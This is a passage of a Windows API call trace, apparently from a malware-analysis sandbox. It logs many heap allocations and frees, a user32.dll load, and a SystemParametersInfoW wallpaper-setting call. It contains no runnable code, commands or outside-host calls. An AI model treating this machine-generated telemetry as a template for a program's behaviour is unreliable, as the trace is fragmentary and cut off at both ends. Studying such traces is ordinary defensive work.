HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0321.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0321.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0321.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0321.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0321.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0321.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0321.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0321.105] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0321.106] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0321.106] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0321.106] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0321.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0321.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0321.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0321.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0321.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0321.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0321.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0321.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0321.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0321.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0321.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0321.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0321.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0321.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0321.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0321.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0321.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0321.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0321.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0321.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0321.114] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0321.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0321.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0321.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0321.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0321.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0321.115] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0321.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0321.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0321.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0321.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.116] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0321.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 